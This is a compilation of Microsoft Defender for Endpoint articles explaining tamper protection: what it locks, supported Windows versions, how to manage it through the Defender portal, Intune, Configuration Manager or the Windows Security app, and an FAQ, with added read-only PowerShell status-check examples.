Set preferences for Microsoft Defender for Endpoint on Linux
Microsoft Defender for Endpoint on Linux
Configure Defender for Endpoint on Android features
Configure Microsoft Defender for Endpoint on iOS features

See also
Configure device proxy and Internet connectivity settings for Microsoft Defender
for Endpoint
Use Group Policy settings to configure and manage Microsoft Defender Antivirus
Important changes to Microsoft Active Protection Services endpoint



Protect security settings with tamper protection
Article • 02/13/2024

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender Antivirus
Microsoft Defender for Business
Microsoft 365 Business Premium

Platforms

Windows
macOS

What is tamper protection?


Tamper protection is a capability in Microsoft Defender for Endpoint that helps protect
certain security settings, such as virus and threat protection, from being disabled or
changed. During some kinds of cyber attacks, bad actors try to disable security features
on devices. Disabling security features provides bad actors with easier access to your
data, the ability to install malware, and the ability to exploit your data, identity, and
devices. Tamper protection helps guard against these types of activities.

Tamper protection is part of anti-tampering capabilities that include standard protection
attack surface reduction rules. Tamper protection is an important part of built-in
protection.

What happens when tamper protection is turned on?

When tamper protection is turned on, these tamper-protected settings can't be
changed:

Virus and threat protection remains enabled.
Real-time protection remains turned on.
Behavior monitoring remains turned on.
Antivirus protection, including IOfficeAntivirus (IOAV), remains enabled.
Cloud protection remains enabled.
Security intelligence updates occur.
Automatic actions are taken on detected threats.
Notifications are visible in the Windows Security app on Windows devices.
Archived files are scanned.
Exclusions cannot be modified or added.

As of signature release 1.383.1159.0, due to confusion around the default value for "Allow
Scanning Network Files", tamper protection no longer locks this setting to its default value.
In managed environments, the default value is enabled.

Important

When tamper protection is turned on, tamper-protected settings cannot be
changed. To avoid breaking management experiences, including Intune and
Configuration Manager, keep in mind that changes made to tamper-protected
settings might appear to succeed but are actually blocked by tamper protection.
Depending on your particular scenario, you have several options available:

If you must make changes to a device and those changes are blocked by
tamper protection, you can use troubleshooting mode to temporarily disable
tamper protection on the device.
You can use Intune or Configuration Manager to exclude devices from tamper
protection.

Tamper protection doesn't prevent you from viewing your security settings. And, tamper
protection doesn't affect how non-Microsoft antivirus apps register with the Windows
Security app. If your organization is using Defender for Endpoint, individual users can't
change the tamper protection setting; in those cases, your security team manages
tamper protection. For more information, see How do I configure or manage tamper
protection?

On what devices can tamper protection be enabled?

Tamper protection is available for devices that are running one of the following versions
of Windows:

Windows 10 and 11 (including Enterprise multi-session)
Windows Server 2022, Windows Server 2019, and Windows Server, version 1803 or
later
Windows Server 2016 and Windows Server 2012 R2 (using the modern, unified
solution)

Tamper protection is also available for Mac, although it works a little differently than on
Windows. For more information, see Protect macOS security settings with tamper
protection.

Tip

Built-in protection includes turning tamper protection on by default. For more
information, see:

Built-in protection helps guard against ransomware (article)
Tamper protection will be turned on for all enterprise customers (Tech
Community blog post)

Tamper protection on Windows Server 2012 R2, 2016, or Windows version 1709, 1803, or 1809

If you're using Windows Server 2012 R2 (with the modern unified solution), Windows
Server 2016, or Windows 10 version 1709, 1803, or 1809, you don't see Tamper Protection
in the Windows Security app. Instead, you can use PowerShell to determine whether
tamper protection is enabled.

Important

On Windows Server 2016, the Settings app doesn't accurately reflect the status of
real-time protection when tamper protection is enabled.

Use PowerShell to determine whether tamper protection and real-time protection are turned on

1. Open the Windows PowerShell app.

2. Use the Get-MpComputerStatus PowerShell cmdlet.

3. In the list of results, look for IsTamperProtected or RealTimeProtectionEnabled. (A
value of true means tamper protection is enabled.)

How do I configure or manage tamper protection?

You can use Microsoft Intune and other methods to configure or manage tamper
protection, as listed in the following table:


Method: Use the Microsoft Defender portal.
What you can do: Turn tamper protection on (or off), tenant wide. See Manage tamper
protection for your organization using Microsoft Defender XDR.
This method doesn't override settings that are managed in Microsoft Intune or
Configuration Manager.

Method: Use the Microsoft Intune admin center or Configuration Manager.
What you can do: Turn tamper protection on (or off), tenant wide, or apply tamper
protection to some users/devices. You can exclude certain devices from tamper
protection. See Manage tamper protection for your organization using Intune.
Protect Microsoft Defender Antivirus exclusions from tampering if you're using Intune
only or Configuration Manager only. See Tamper protection for antivirus exclusions.

Method: Use Configuration Manager with tenant attach.
What you can do: Turn tamper protection on (or off), tenant wide, or apply tamper
protection to some users/devices. You can exclude certain devices from tamper
protection. See Manage tamper protection for your organization using tenant attach
with Configuration Manager, version 2006.

Method: Use the Windows Security app.
What you can do: Turn tamper protection on (or off) on an individual device that isn't
managed by a security team (such as devices for home use). See Manage tamper
protection on an individual device.
This method doesn't override tamper protection settings that are set in the Microsoft
Defender portal, Intune, or Configuration Manager, and it isn't intended to be used by
organizations.

Tip

If you're using Group Policy to manage Microsoft Defender Antivirus settings, keep
in mind that any changes made to tamper-protected settings are ignored. If you
must make changes to a device and those changes are blocked by tamper
protection, use troubleshooting mode to temporarily disable tamper protection on
the device. After troubleshooting mode ends, any changes made to tamper-protected
settings are reverted to their configured state.

Protect Microsoft Defender Antivirus exclusions


Under certain conditions, tamper protection can protect exclusions that are defined for
Microsoft Defender Antivirus. For more information, see Tamper protection for
exclusions.

View information about tampering attempts


Tampering attempts typically indicate that a larger cyberattack has taken place. Bad
actors try to change security settings as a way to persist and stay undetected. If you're
part of your organization's security team, you can view information about such
attempts, and then take appropriate actions to mitigate threats.

Whenever a tampering attempt is detected, an alert is raised in the Microsoft Defender
portal (https://security.microsoft.com).

Using endpoint detection and response and advanced hunting capabilities in Microsoft
Defender for Endpoint, your security operations team can investigate and address such
attempts.

Review your security recommendations


Tamper protection integrates with Microsoft Defender Vulnerability Management
capabilities. Security recommendations include making sure tamper protection is turned
on. For example, in your Vulnerability Management dashboard, you can search on
tamper. In the results, you can select Turn on Tamper Protection to learn more and turn
it on.

To learn more about Microsoft Defender Vulnerability Management, see Dashboard
insights - Defender Vulnerability Management.

See also
Built-in protection helps guard against ransomware
Frequently asked questions on tamper protection
Troubleshoot problems with tamper protection
Defender for Endpoint on non-Windows devices


Manage tamper protection for your organization using Microsoft Defender portal
Article • 11/15/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender Antivirus
Microsoft Defender for Business
Microsoft 365 Business Premium

Platforms

Windows

Tamper protection helps protect certain security settings, such as virus and threat
protection, from being disabled or changed. If you're part of your organization's security
team, you can turn tamper protection on (or off) tenant wide by using the Microsoft
Defender portal (https://security.microsoft.com).

Important

If tamper protection is deployed and managed through Intune, turning tamper
protection on or off in the Microsoft Defender portal won't impact the state of
tamper protection. It restricts tamper-protected settings to their secure default
values. For more information, see What happens when tamper protection is
turned on?

Requirements for managing tamper protection in the Microsoft Defender portal

You must have appropriate permissions assigned through roles, such as Global
Administrator or Security Administrator. (See Microsoft Defender XDR role-based
access control (RBAC).)

Devices must be running certain versions of Windows or macOS. (See On what
devices can tamper protection be enabled?)

Devices must be onboarded to Microsoft Defender for Endpoint.

Devices must be using anti-malware platform version 4.18.2010.7 (or above) and
anti-malware engine version 1.1.17600.5 (or above). (Manage Microsoft Defender
Antivirus updates and apply baselines.)

Cloud-delivered protection must be turned on.

Note

When tamper protection is enabled via the Microsoft Defender portal, cloud-
delivered protection is required so that the enabled state of tamper protection can
be controlled. Starting with the November 2021 update (platform version
4.18.2111.5), if cloud-delivered protection is not already turned on for a device
when tamper protection is turned on, cloud-delivered protection is turned on
automatically on the device.

Turn tamper protection on (or off) in the Microsoft Defender portal

1. Go to the Microsoft Defender portal (https://security.microsoft.com) and sign in.

2. Choose Settings > Endpoints.

3. Go to General > Advanced features, and then turn tamper protection on.

Important points to keep in mind

Currently, the option to manage tamper protection in the Microsoft Defender
portal is on by default for new deployments, as part of built-in protection, which
helps guard against ransomware. For existing deployments, tamper protection is
available on an opt-in basis. To opt in, in the Microsoft Defender portal, choose
Settings > Endpoints > Advanced features > Tamper protection.

When you enable tamper protection in the Microsoft Defender portal, the setting
is applied tenant wide and restricts tamper-protected settings to their secure
defaults. Any changes made to tamper-protected settings are ignored. Depending
on your particular scenario, you have several options available:

If you must make changes to a device and those changes are blocked by tamper
protection, you can use troubleshooting mode to temporarily disable tamper
protection on the device.

You can use Intune or Configuration Manager to exclude devices from tamper
protection.

If you're managing tamper protection through Intune and certain other
conditions are met, you can manage tamper-protected antivirus exclusions.

See also
Built-in protection helps guard against ransomware
What happens when tamper protection is turned on?
Defender for Endpoint on non-Windows devices
Troubleshoot problems with tamper protection



Manage tamper protection for your organization using Microsoft Intune
Article • 10/27/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender Antivirus
Microsoft Defender for Business
Microsoft 365 Business Premium

Platforms

Windows

Tamper protection helps protect certain security settings, such as virus and threat
protection, from being disabled or changed. If you're part of your organization's security
team, and you're using Microsoft Intune, you can manage tamper protection for your
organization in the Intune admin center. Or, you can use Configuration Manager. With
Intune or Configuration Manager, you can:

Turn tamper protection on (or off) for some or all devices.
Protect Microsoft Defender Antivirus exclusions from tampering (certain
requirements must be met).

Important

If you're using Microsoft Intune to manage Defender for Endpoint settings, make
sure to set DisableLocalAdminMerge to true on devices.

When tamper protection is turned on, tamper-protected settings cannot be
changed. To avoid breaking management experiences, including Intune (and
Configuration Manager), keep in mind that changes to tamper-protected settings
might appear to succeed but are actually blocked by tamper protection. Depending
on your particular scenario, you have several options available:

If you must make changes to a device and those changes are blocked by
tamper protection, we recommend using troubleshooting mode to
temporarily disable tamper protection on the device. Note that after
troubleshooting mode ends, any changes made to tamper-protected settings
are reverted to their configured state.
You can use Intune or Configuration Manager to exclude devices from
tamper protection.
If you're managing tamper protection through Intune, you can change
tamper-protected antivirus exclusions.

Requirements for managing tamper protection in Intune

Requirement: Roles and permissions
Details: You must have appropriate permissions assigned through roles, such as Global
Administrator or Security Administrator. See Microsoft Entra roles with Intune access.

Requirement: Device management
Details: Your organization uses Intune to manage devices.

Requirement: Intune licenses
Details: Intune licenses are required. See Microsoft Intune licensing.

Requirement: Operating System
Details: Windows devices must be running Windows 10 version 1709 or later or
Windows 11. (For more information about releases, see Windows release information.)
For Mac, see Protect macOS security settings with tamper protection.

Requirement: Security intelligence
Details: You must be using Windows security with security intelligence updated to
version 1.287.60.0 (or later).

Requirement: Antimalware platform
Details: Devices must be using antimalware platform version 4.18.1906.3 (or above)
and anti-malware engine version 1.1.15500.X (or later). See Manage Microsoft
Defender Antivirus updates and apply baselines.

Requirement: Microsoft Entra ID
Details: Your Intune and Defender for Endpoint tenants must share the same Microsoft
Entra infrastructure.

Requirement: Defender for Endpoint
Details: Your devices must be onboarded to Defender for Endpoint.

Note

If devices are not enrolled in Microsoft Defender for Endpoint, tamper protection
shows up as Not Applicable until the onboarding process completes. Tamper
protection can prevent changes to security settings from occurring. If you see an
error code with Event ID 5013, see Review event logs and error codes to
troubleshoot issues with Microsoft Defender Antivirus.

Turn tamper protection on (or off) in Microsoft Intune

1. In the Intune admin center, go to Endpoint security > Antivirus, and then
choose + Create Policy.

In the Platform list, select Windows 10, Windows 11, and Windows Server.
In the Profile list, select Windows Security experience.

2. Create a profile that includes the following setting:

TamperProtection (Device): On

3. Finish selecting options and settings for your policy.

4. Deploy the policy to devices.

Tamper protection for antivirus exclusions

If your organization has exclusions defined for Microsoft Defender Antivirus, tamper
protection protects those exclusions, provided all of the following conditions are met:


Condition: Microsoft Defender platform
Criteria: Devices are running Microsoft Defender platform 4.18.2211.5 or later. For
more information, see Monthly platform and engine versions.

Condition: DisableLocalAdminMerge setting
Criteria: This setting is also known as preventing local list merging.
DisableLocalAdminMerge is enabled so that settings configured on a device aren't
merged with organization policies, such as settings in Intune. For more information,
see DisableLocalAdminMerge.

Condition: Device management
Criteria: Devices are either managed in Intune only, or are managed with
Configuration Manager only. Sense must be enabled.

Condition: Antivirus exclusions
Criteria: Microsoft Defender Antivirus exclusions are managed in Microsoft Intune. For
more information, see Settings for Microsoft Defender Antivirus policy in Microsoft
Intune for Windows devices.
Functionality to protect Microsoft Defender Antivirus exclusions is enabled on
devices. For more information, see How to determine whether antivirus exclusions
are tamper protected on a Windows device.

Tip

For more detailed information about Microsoft Defender Antivirus exclusions, see
Exclusions for Microsoft Defender for Endpoint and Microsoft Defender
Antivirus.

How to determine whether antivirus exclusions are tamper protected on a Windows device

You can use a registry key to determine whether the functionality to protect Microsoft
Defender Antivirus exclusions is enabled. The following procedure describes how to
view, but not change, tamper protection status.

1. On a Windows device, open Registry Editor. (Read-only mode is fine; you're not
editing the registry key.)

2. To confirm that the device is managed by Intune only or managed by
Configuration Manager only, with Sense enabled, check the following registry key
values:

ManagedDefenderProductType (located at
Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender or
HKLM\SOFTWARE\Microsoft\Windows Defender)

EnrollmentStatus (located at
Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SenseCM or
HKLM\SOFTWARE\Microsoft\SenseCM)

The following table summarizes what the registry key values mean:


ManagedDefenderProductType value: 6
EnrollmentStatus value: (any value)
What the value means: The device is managed by Intune only. (Meets a requirement
for exclusions to be tamper protected.)

ManagedDefenderProductType value: 7
EnrollmentStatus value: 4
What the value means: The device is managed by Configuration Manager. (Meets a
requirement for exclusions to be tamper protected.)

ManagedDefenderProductType value: A value other than 6 or 7
EnrollmentStatus value: (any value)
What the value means: The device isn't managed by Intune only or Configuration
Manager only. (Exclusions aren't tamper protected.)

3. To confirm that tamper protection is deployed and that exclusions are tamper
protected, check the TPExclusions registry key (located at
Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Features or
HKLM\SOFTWARE\Microsoft\Windows Defender\Features).


TPExclusions value: 1
What the value means: The required conditions are met, and the new functionality to
protect exclusions is enabled on the device. (Exclusions are tamper protected.)

TPExclusions value: 0
What the value means: Tamper protection isn't currently protecting exclusions on the
device. (If all the requirements are met and this state seems incorrect, contact
support.)

Caution

Do not change the value of the registry keys. Use the preceding procedure for
information only. Changing keys has no effect on whether tamper protection
applies to exclusions.
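The registry procedure above and the earlier Get-MpComputerStatus check (under "Use PowerShell to determine whether tamper protection and real-time protection are turned on") can be combined into one read-only PowerShell report. The script below is an added example, not Microsoft's code; the function name and the output field names are mine, and it reads the registry without changing any value, in keeping with the caution above.

```powershell
# Added example (not Microsoft's code). Reads, and never writes, the values the
# article's procedure inspects, then applies its two decision tables. Run from an
# elevated PowerShell prompt on a Windows device with Microsoft Defender Antivirus.
# The function name and the output field names are mine.

function Get-TamperProtectionStatus {
    # Properties the article's PowerShell step looks at.
    $mpStatus = Get-MpComputerStatus

    # Registry values from the procedure above; an absent key simply yields $null.
    $defenderKey = Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows Defender' -ErrorAction SilentlyContinue
    $senseCmKey  = Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\SenseCM' -ErrorAction SilentlyContinue
    $featuresKey = Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows Defender\Features' -ErrorAction SilentlyContinue

    $productType  = $defenderKey.ManagedDefenderProductType
    $enrollment   = $senseCmKey.EnrollmentStatus
    $tpExclusions = $featuresKey.TPExclusions

    # Table: ManagedDefenderProductType / EnrollmentStatus -> management state.
    if ($productType -eq 6) {
        $managementState  = 'Managed by Intune only'
        $meetsRequirement = $true
    } elseif ($productType -eq 7 -and $enrollment -eq 4) {
        $managementState  = 'Managed by Configuration Manager only'
        $meetsRequirement = $true
    } else {
        $managementState  = 'Not managed by Intune only or Configuration Manager only'
        $meetsRequirement = $false
    }

    # Table: TPExclusions -> whether exclusions are tamper protected.
    if ($tpExclusions -eq 1) {
        $exclusionsProtected = $true
    } elseif ($tpExclusions -eq 0) {
        $exclusionsProtected = $false
    } else {
        $exclusionsProtected = $null   # value not present: nothing to conclude
    }

    [pscustomobject]@{
        IsTamperProtected          = $mpStatus.IsTamperProtected
        RealTimeProtectionEnabled  = $mpStatus.RealTimeProtectionEnabled
        ManagedDefenderProductType = $productType
        EnrollmentStatus           = $enrollment
        ManagementState            = $managementState
        MeetsExclusionRequirement  = $meetsRequirement
        TPExclusions               = $tpExclusions
        ExclusionsTamperProtected  = $exclusionsProtected
        # Only the registry-visible requirements are checked here; platform version and
        # DisableLocalAdminMerge from the conditions table still need separate verification.
        ReviewWithSupport          = ($meetsRequirement -and $mpStatus.IsTamperProtected -and $tpExclusions -eq 0)
    }
}

Get-TamperProtectionStatus | Format-List
```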

See also
Frequently asked questions (FAQs) on tamper protection
Defender for Endpoint on non-Windows devices
Troubleshoot problems with tamper protection
Manage Microsoft Defender for Endpoint on devices with Microsoft Intune



Manage tamper protection using tenant attach with Configuration Manager, version 2006
Article • 10/27/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender Antivirus
Microsoft Defender for Business
Microsoft 365 Business Premium

Platforms

Windows

Tamper protection helps protect certain security settings, such as virus and threat
protection, from being disabled or changed. If you're part of your organization's security
team, and you're using version 2006 of Configuration Manager, you can manage tamper
protection for devices by using a method called tenant attach. Tenant attach enables
you to sync your on-premises-only Configuration Manager devices into the Intune
admin center, and then deliver endpoint security configuration policies to on-premises
collections & devices.

Using Configuration Manager with tenant attach, you can turn tamper protection on (or
off) for some or all devices.

Important

When tamper protection is turned on, tamper-protected settings cannot be
changed. To avoid breaking management experiences, including Intune and
Configuration Manager, keep in mind that changes to tamper-protected settings
might appear to succeed but are actually blocked by tamper protection. Depending
on your particular scenario, you have several options available:

If you must make changes to a device and those changes are blocked by
tamper protection, use troubleshooting mode to temporarily disable tamper
protection on the device.
Use Intune or Configuration Manager to exclude devices from tamper
protection.

1. Set up tenant attach. To learn more, see Get started: Create and deploy endpoint
security policies from the admin center.

2. In the Intune admin center, go to Endpoint security > Antivirus, and then
choose + Create Policy.

In the Platform list, select Windows 10, Windows 11, and Windows Server
(ConfigMgr).
In the Profile list, select Windows Security experience (preview).

3. On the Configuration settings step, under Windows Security, set Enable tamper
protection to prevent Microsoft Defender from being disabled to Enabled.

4. Finish selecting options and settings for your policy.

5. Deploy the policy to your devices.

See also
Frequently asked questions (FAQs) on tamper protection
Defender for Endpoint on non-Windows devices
Tech Community Blog: Announcing Tamper Protection for Configuration Manager
Tenant Attach clients
Troubleshoot problems with tamper protection



Manage tamper protection on an individual device
Article • 10/27/2023

Applies to:

Microsoft Defender Antivirus

Platforms

Windows

Tamper protection helps protect certain security settings, such as virus and threat
protection, from being disabled or changed.

If you're a home user, or you aren't subject to settings managed by a security team, you
can use the Windows Security app to manage tamper protection on an individual
Windows device. You must have appropriate admin permissions on your device to
change security settings, such as tamper protection.

1. On a Windows device, select Start, and start typing Security. In the search results,
select Windows Security.

2. Select Virus & threat protection > Virus & threat protection settings.

3. Set Tamper Protection to On or Off.

Here's what you see in the Windows Security app:


Note

Tamper protection blocks attempts to modify Microsoft Defender Antivirus settings
through the registry.

To help ensure that tamper protection doesn't interfere with non-Microsoft security
products or enterprise installation scripts that modify these settings, go to
Windows Security and update Security intelligence to version 1.287.60.0 or later.
(See Security intelligence updates.)

After you've made this update, tamper protection continues to protect your registry
settings, and logs attempts to modify them without returning errors.
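The following PowerShell script is an added example, not code from the Microsoft article. It reports the tamper protection state that the Windows Security app shows, using the Defender module that ships with Windows (Get-MpComputerStatus), and then lists recent changes that tamper protection blocked from the Defender operational event log. The event ID 5013 used for blocked changes and the default 7-day window are assumptions; run it in an elevated session.

```powershell
# Added example (not part of the Microsoft article): report the tamper
# protection state of the local device and list recent changes that tamper
# protection blocked. Requires an elevated PowerShell session and the
# Defender module that ships with Windows (Get-MpComputerStatus).

function Get-TamperProtectionReport {
    [CmdletBinding()]
    param(
        # How far back to look for blocked-change events (assumed default: 7 days)
        [int]$Days = 7
    )

    $status = Get-MpComputerStatus

    $report = [ordered]@{
        Computer               = $env:COMPUTERNAME
        IsTamperProtected      = $status.IsTamperProtected
        # Where the current setting came from (for example Intune or the
        # Defender portal); the product reports the value, this script only shows it.
        TamperProtectionSource = $status.TamperProtectionSource
        RealTimeProtection     = $status.RealTimeProtectionEnabled
        BlockedChanges         = @()
    }

    # Event ID 5013 in the Defender operational log records a change that tamper
    # protection blocked. The ID is an assumption taken from the Defender event
    # reference; adjust it if your platform version logs a different ID.
    $filter = @{
        LogName   = 'Microsoft-Windows-Windows Defender/Operational'
        Id        = 5013
        StartTime = (Get-Date).AddDays(-$Days)
    }
    # Get-WinEvent reports an error when nothing matches; treat that as "no events".
    $events = Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue

    foreach ($e in $events) {
        $report.BlockedChanges += [pscustomobject]@{
            Time    = $e.TimeCreated
            Message = ($e.Message -split "`r?`n")[0]   # first line of the message only
        }
    }

    [pscustomobject]$report
}

# Usage: run elevated, then inspect the result.
$r = Get-TamperProtectionReport -Days 14
$r | Format-List IsTamperProtected, TamperProtectionSource, RealTimeProtection
if (-not $r.IsTamperProtected) {
    Write-Warning "Tamper protection is OFF on $($r.Computer); turn it on in the Windows Security app or through your management tool."
}
$r.BlockedChanges | Format-Table -AutoSize
```

Because tamper protection logs blocked registry changes without returning an error to the caller (as the note above explains), the event log is the place to look when an installation script appears to have changed a setting that stayed unchanged.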

See also
Protect security settings with tamper protection
Defender for Endpoint on non-Windows devices
Troubleshoot problems with tamper protection



Frequently asked questions (FAQs) about tamper protection
FAQ

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender Antivirus
Microsoft Defender for Business
Microsoft 365 Business Premium

Platforms

Windows

What are the device requirements for tamper protection to reach devices when
tamper protection is enabled in the Microsoft Defender portal?

Devices must meet all of the following requirements:

Devices must be running certain versions of Windows or macOS. (See On what
devices can tamper protection be enabled?)
Devices must be onboarded to Microsoft Defender for Endpoint.
Devices must be using anti-malware platform version 4.18.2010.7 (or later) and
anti-malware engine version 1.1.17600.5 (or later). (Manage Microsoft Defender
Antivirus updates and apply baselines.)
Cloud-delivered protection must be turned on.

To manage tamper protection in the Microsoft Defender portal
(https://security.microsoft.com), you must have appropriate permissions assigned
through roles, such as Global Administrator or Security Administrator. (See Microsoft
Defender XDR role-based access control (RBAC).)

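The following PowerShell script is an added example, not code from the Microsoft FAQ. It checks a Windows device against the requirements listed above, using the platform and engine version numbers quoted in the FAQ and the built-in Defender module. Treating a running "Sense" service as the sign that the device is onboarded to Defender for Endpoint is an assumption; the OS version check is left to the reader.

```powershell
# Added example (not part of the Microsoft FAQ): check a Windows device against
# the requirements listed above for portal-managed tamper protection.
# Assumes the built-in Defender PowerShell module; run in an elevated session.

function Test-TamperProtectionPrerequisites {
    $status = Get-MpComputerStatus
    $pref   = Get-MpPreference

    # Minimum versions quoted in the FAQ.
    $minPlatform = [version]'4.18.2010.7'
    $minEngine   = [version]'1.1.17600.5'

    # Assumption: the Defender for Endpoint sensor service ("Sense") runs on onboarded devices.
    $sense = Get-Service -Name Sense -ErrorAction SilentlyContinue

    $checks = @(
        [pscustomobject]@{
            Check  = "Anti-malware platform >= $minPlatform"
            Actual = $status.AMProductVersion
            Passed = ([version]$status.AMProductVersion -ge $minPlatform)
        }
        [pscustomobject]@{
            Check  = "Anti-malware engine >= $minEngine"
            Actual = $status.AMEngineVersion
            Passed = ([version]$status.AMEngineVersion -ge $minEngine)
        }
        [pscustomobject]@{
            # MAPSReporting: 0 = Disabled, 1 = Basic, 2 = Advanced.
            # Anything other than 0 means cloud-delivered protection is on.
            Check  = 'Cloud-delivered protection turned on'
            Actual = "MAPSReporting=$($pref.MAPSReporting)"
            Passed = ($pref.MAPSReporting -ne 0)
        }
        [pscustomobject]@{
            Check  = 'Onboarded to Defender for Endpoint (Sense service running)'
            Actual = if ($sense) { $sense.Status } else { 'service not present' }
            Passed = ($null -ne $sense -and $sense.Status -eq 'Running')
        }
    )
    # The OS version requirement is not automated here: compare the device's
    # Windows or macOS version with the FAQ's supported list.
    $checks
}

$results = Test-TamperProtectionPrerequisites
$results | Format-Table -AutoSize
if ($results.Passed -contains $false) {
    Write-Warning 'One or more prerequisites are not met; tamper protection turned on in the portal will not reach this device.'
}
```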
On which versions of Windows can I
configure tamper protection?
Windows 11
Windows 11 Enterprise multi-session
Windows 10 OS 1709, 1803, 1809, or later together with Microsoft Defender for
Endpoint.
Windows 10 Enterprise multi-session

If you're using Configuration Manager, version 2006, with tenant attach, tamper
protection can be extended to Windows Server 2012 R2, Windows Server 2016,
Windows Server 2019, and Windows Server 2022. See Tenant attach: Create and deploy
endpoint security Antivirus policy from the admin center (preview).

Does tamper protection affect non-Microsoft Antivirus registration in the
Windows Security app?

No. Non-Microsoft Antivirus offerings continue to register with the Windows Security
application.

What happens if Microsoft Defender Antivirus isn't active on a device?

If non-Microsoft antivirus/antimalware software is installed on a device, when that
device is onboarded to Microsoft Defender for Endpoint, Microsoft Defender Antivirus
runs in passive mode by default. Tamper protection protects the service and its features.

If/when non-Microsoft antivirus/antimalware software is uninstalled, Microsoft Defender
Antivirus switches to active mode automatically. Tamper protection continues to protect
the service and its features.

How do I turn tamper protection on or off?

We recommend using Microsoft Intune to manage Microsoft Defender Antivirus settings
for your organization. With Intune, you can control where tamper protection is enabled
(or disabled) through policies. You can also protect Microsoft Defender Antivirus
exclusions. See Tamper protection: Microsoft Defender Antivirus exclusions.

You can also use the Microsoft Defender portal or Configuration Manager.

If you're a home user, see Manage tamper protection on an individual device.

Tamper protection is part of built-in protection, and should be enabled.

Does tamper protection apply to Microsoft Defender Antivirus exclusions?

New functionality is rolling out now to protect Microsoft Defender Antivirus exclusions
on devices. Certain conditions must be met. For example, you must use Intune only or
Configuration Manager only to manage devices, and you must have Sense enabled. See
Protect Microsoft Defender Antivirus exclusions.

How does configuring tamper protection in Intune affect how I manage
Microsoft Defender Antivirus with Group Policy?

If you're currently using Intune to configure and manage tamper protection, you should
continue using Intune. When tamper protection is turned on and you use Group Policy
to make changes to Microsoft Defender Antivirus settings, any settings that are
protected by tamper protection are ignored.

If you must make changes to a device and those changes are blocked by tamper
protection, you can use troubleshooting mode to temporarily disable tamper
protection on the device. After troubleshooting mode ends, any changes made to
tamper-protected settings are reverted to their configured state.
You can use Intune or Configuration Manager to exclude devices from tamper
protection.
If you're managing tamper protection through Intune and certain other conditions
are met, you can manage tamper-protected antivirus exclusions.

If we use Microsoft Intune to configure tamper protection, does it apply only to
the entire organization?

If you're using Intune to configure and manage tamper protection, you don't necessarily
have to apply tamper protection to your entire organization. With Intune, you can
choose to apply tamper protection to your entire organization, or you can select specific
devices or user groups to receive tamper protection. You can also exclude specific
devices from tamper protection.

What settings can't be changed when tamper protection is turned on?

When tamper protection is turned on, the following security settings are protected from
being changed:

Virus and threat protection remains enabled.
Real-time protection remains turned on.
Behavior monitoring remains turned on.
Antivirus protection, including IOfficeAntivirus (IOAV), remains enabled.
Cloud protection remains enabled.
Security intelligence updates continue to occur.
Automatic actions are taken on detected threats.
Notifications are visible in the Windows Security app on Windows devices.
Archived files are scanned.

For more information, see What happens when tamper protection is turned on?

If tamper protection is turned on in Microsoft Defender XDR, can settings in
Intune or Configuration Manager override it?

When tamper protection is turned on in the Microsoft Defender portal
(https://security.microsoft.com), tamper protection is turned on, tenant wide.
However, policies defined in Intune or Configuration Manager can override settings in
the Microsoft Defender portal. For example, you can define a policy in Intune or
Configuration Manager that excludes certain devices from tamper protection.

How do I deploy
DisableLocalAdminMerge?
Use Intune to deploy DisableLocalAdminMerge.

How can I confirm whether exclusions are tamper protected on a Windows
device?

Follow the guidance in Manage tamper-protected antivirus exclusions.

If tamper protection is turned on for exclusions, do I need to disable it to
apply new exclusions policy settings from Intune or Configuration Manager?

No. When tamper protection for exclusions is enabled, you do not need to disable it to
apply new exclusions.

Can I configure tamper protection with Configuration Manager?

Yes. Similar to using Intune, you can apply tamper protection to your whole
organization, or to specific users and devices. For more information, see the following
resources:

Manage tamper protection using Intune
Manage tamper protection using tenant attach with Configuration Manager,
version 2006
Tech Community blog: Announcing Tamper Protection for Configuration Manager
Tenant Attach clients

I'm an enterprise customer. Can local admins change tamper protection on
their devices?

In general, tamper protection helps protect against users being able to change security
settings directly on devices. Tamper protection is part of anti-tampering capabilities that
include standard protection attack surface reduction rules. To further prevent malware
from running in kernel, consider using driver block rules with Application Control for
Windows.

What happens if my device is onboarded with Microsoft Defender for Endpoint
and then goes into an off-boarded state?

If a device is off-boarded from Microsoft Defender for Endpoint, tamper protection is
turned on, which is the default state for unmanaged devices.

If the status of tamper protection changes, are alerts shown in the
Microsoft Defender portal?

Alerts should be listed in the Microsoft Defender portal under Alerts.

Your security operations team can also use hunting queries, such as the following
example:

AlertInfo | where Title == "Tamper Protection bypass"

What are all the options for configuring tamper protection?

You can use any of the following methods to configure tamper protection:

The Microsoft Defender portal (turn tamper protection on or off, tenant wide)
Intune (turn tamper protection on or off, and/or configure tamper protection for
some or all users)
Configuration Manager (with tenant attach, you can configure tamper protection
for some or all devices by using the Windows Security experience profile).
Windows Security app (for an individual device used at home or in situations
where a security team doesn't manage your device)

Note

We recommend keeping tamper protection turned on for your whole organization.
If tamper protection prevents your IT or security team from performing a necessary
task on a device, consider using troubleshooting mode instead of disabling tamper
protection.



Turn on block at first sight
Article • 02/16/2024

Applies to:

Microsoft Defender for Endpoint Plan 1


Microsoft Defender for Endpoint Plan 2
Microsoft Defender Antivirus

Platforms

Windows

This article describes an antivirus/antimalware feature known as "block at first sight",
and describes how to enable block at first sight for your organization.

Tip

This article is intended for enterprise admins and IT Pros who manage security
settings for organizations. If you are not an enterprise admin or IT Pro but you have
questions about block at first sight, see the Not an enterprise admin or IT Pro?
section.

What is "block at first sight"?

Block at first sight is a threat protection feature of next-generation protection that
detects new malware and blocks it within seconds. Block at first sight is enabled when
certain security settings are enabled:

Cloud protection is turned on;
Sample submission is configured for samples to be sent automatically; and
Microsoft Defender Antivirus is up to date on devices.

